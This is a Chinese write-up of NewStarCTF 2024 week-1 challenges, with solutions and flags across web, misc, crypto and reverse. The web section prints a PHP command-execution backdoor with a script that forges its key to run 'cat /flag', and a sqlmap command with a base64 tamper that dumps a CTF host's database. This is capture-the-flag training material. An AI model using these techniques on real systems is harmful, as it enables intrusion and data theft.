2024-NewStarCTF-WEEK1

web

headach3

提示head，抓包查看响应头，得到flag

flag值：flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

会赢吗

第一段：源码里找到第一段flag，ZmxhZ3tXQTB3

第二段：分析可知需要在控制台调用revealFlag函数向服务器发送POST请求到 /api/flag/4cqu1siti0n，得到第二段flag IV95NF9yM2Fs

revealFlag('4cqu1siti0n');

第三段：修改stateElement参数内容为解封，点击按钮触发事件得到flag，MXlfR3I0c1B

document.getElementById('state').textContent = '解封';

第四段：用插件禁用js，得到最后一段flag，fSkpKcyF9

四段拼接起来，base64解码，得到flag

flag值：flag{WA0w!_y4_r3al1y_Gr4sP_JJJs!}

智械危机

题目提示robots.txt，访问发现一个php界面

源码如下，代码审计后门php

<?phpfunction execute_cmd($cmd) {system($cmd);}function decrypt_request($cmd, $key) {$decoded_key = base64_decode($key);$reversed_cmd = '';for ($i = strlen($cmd) - 1; $i >= 0; $i--) {$reversed_cmd .= $cmd[$i];}$hashed_reversed_cmd = md5($reversed_cmd);if ($hashed_reversed_cmd !== $decoded_key) {die("Invalid key");}$decrypted_cmd = base64_decode($cmd);return $decrypted_cmd;}if (isset($_POST['cmd']) && isset($_POST['key'])) {execute_cmd(decrypt_request($_POST['cmd'],$_POST['key']));
}
else {highlight_file(__FILE__);
}
?> 

加密流程是：post提交cmd和key，base解码key,cmd反转，md5加密的反转cmd等于解码后的key,最后将cmd解码

按照给出的逻辑，逆向加密一下，得到flag，脚本如下

import base64
import hashlibdef encode(cmd):encoded_cmd = base64.b64encode(cmd.encode()).decode()reversed_cmd = encoded_cmd[::-1]md5_cmd = hashlib.md5(reversed_cmd.encode()).hexdigest()key = base64.b64encode(md5_cmd.encode()).decode()return encoded_cmd, keycmd = "cat /flag"
encoded_cmd, key = encode(cmd)
print(f"cmd={encoded_cmd}&key={key}")

flag值： flag{26f0ff62-c087-468c-821d-06f519977e22}

谢谢皮蛋

输入不同的id得到不同的结果，可以确定是sql注入了

抓包可以看到参数被base64编码了，刚好前两天学了sqlmap的使用，直接试试sqlmap的tamper模块

使用--tamper=base64encode.py对输入的参数进行base64编码，一键脱库，得到flag

python sqlmap.py http://eci-2zeb4o4fzbdh0lzlc9h2.cloudeci1.ichunqiu.com/ --data="id=1" --tamper=base64encode.py --dump

flag值：flag{e60a762a-b153-41b5-b041-4f2b403414ab}

Misc

decompress

压缩包套娃，一直解到最后一层，将文件提取出来

提示给出了一个正则，按照正则爆破密码，一共五位，第四位是数字

^([a-z]){3}\d[a-z]$

无所谓，一共就五位数，懒得写脚本了，直接ARCHPR爆破，得到密码 xtr4m，解压得到flag

flag值：flag{U_R_th3_ma5ter_0f_dec0mpress}

pleasingMusic

使用Audacity打开，中间是一段摩斯密码，提示倒着手动敲出来，得到flag

. --.. ..--.- -- --- .-. ... . ..--.- -.-. --- -.. .

摩斯解码得到flag

flag值：flag{ez_morse_code}

WhereIsFlag

慢慢翻，最后在环境变量里找到flag

flag值：flag{9e7a4f9f-ce98-4b87-8cd0-a61ca73083b3}

Labyrinth

使用StegSlove翻到一张二维码，扫码得到flag

flag值：flag{e33bb7a1-ac94-4d15-8ff7-fd8c88547b43}

兑换码

随波逐流爆破出高度，得到flag

flag值：flag{La_vaguelette}

Crypto

xor

将flag1和flag2重新与key异或回去，写解密脚本

from Crypto.Util.number import long_to_bytes
from pwn import xorc1 = 8091799978721254458294926060841
c2 = b';:\x1c1<\x03>*\x10\x11u;'
key = b'New_Star_CTF'key_int = int.from_bytes(key, 'big')flag1 = long_to_bytes(c1 ^ key_int)
flag2 = xor(key, c2)print(flag1 + flag2)# flag{0ops!_you_know_XOR!}

flag值：flag{0ops!_you_know_XOR!}

Base

cyberchef一把梭

flag值：flag{B@sE_0f_CrYpt0_N0W}

一眼秒了

在线网站分解n,然后是正常的rsa解密

from Crypto.Util.number import inverse, long_to_bytesc = 48757373363225981717076130816529380470563968650367175499612268073517990636849798038662283440350470812898424299904371831068541394247432423751879457624606194334196130444478878533092854342610288522236409554286954091860638388043037601371807379269588474814290382239910358697485110591812060488786552463208464541069
p = 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956044421
q = 7221289171488727827673517139597844534869368289455419695964957239047692699919030405800116133805855968123601433247022090070114331842771417566928809956045093
e = 65537
n = p * qphi_n = (p - 1) * (q - 1)
d = inverse(e, phi_n)
m = pow(c, d, n)
flag = long_to_bytes(m)print(flag.decode())# flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2}

flag值：flag{9cd4b35a-affc-422a-9862-58e1cc3ff8d2}

Strange King

根据题目名称结合密文特征，想到是凯撒偏移密码，枚举，偏移量为5时开头是f

fnem{ZxsqkyZmNqxYbybZuslelg}

根据提示猜测可能是然后每个字符依次移位，写脚本得到flag

str_encrypted = "fnem{ZxsqkyZmNqxYbybZuslelg}"str_decrypted = ""
for i, word in enumerate(str_encrypted):n = -(i * 2)if word == "{":word_decrypted = "{"elif word == "}":word_decrypted = "}"elif word.islower():word_decrypted = chr((ord(word) - ord("a") + n) % 26 + ord("a"))elif word.isupper():word_decrypted = chr((ord(word) - ord("A") + n) % 26 + ord("A"))else:word_decrypted = wordstr_decrypted += word_decryptedprint("明文为：", str_decrypted)

flag值：flag{PleaseDoNotStopLearing}

Reverse

begin

考察IDA的使用

找到flag1，按a键将数据转化为可见字符

shift+F12，找到字符串，点开就能看到flag2和flag3

得到flag:flag{Mak3_aN_3Ff0rt_tO_5eArcH_F0r_th3_f14g_C0Rpse}

base64

换表base64，找到flag和base表

cyberchef解码得到flag

flag值：flag{y0u_kn0w_base64_well}

Simple_encryption

简单的算法题，AI写个脚本得到flag

# 定义 buffer 的值
buffer = bytearray([0x47, 0x95, 0x34, 0x48, 0xA4, 0x1C, 0x35, 0x88, 0x64, 0x16, 0x88,0x07, 0x14, 0x6A, 0x39, 0x12, 0xA2, 0x0A, 0x37, 0x5C, 0x07, 0x5A,0x56, 0x60, 0x12, 0x76, 0x25, 0x12, 0x8E, 0x28, 0x00, 0x00  # 最后两个0是填充
])def reverse_transform(buffer):original = bytearray(len(buffer))for j in range(len(buffer)):value = buffer[j]if j % 3 == 2:# 反转 XOR 操作value ^= 0x55elif j % 3 == 1:# 反转加法操作value -= 41else:  # j % 3 == 0# 反转减法操作value += 31# 确保值在合法的字节范围内value = value & 0xFF  # 保证值在0到255之间original[j] = valuereturn original# 逆向变换得到原始输入
original_input = reverse_transform(buffer)# 将字节数组转换为可读的字符串
print("Original input should be:", original_input.decode('latin-1', errors='replace'))# flag{IT_15_R3Al1y_V3Ry-51Mp1e}

flag值：flag{IT_15_R3Al1y_V3Ry-51Mp1e}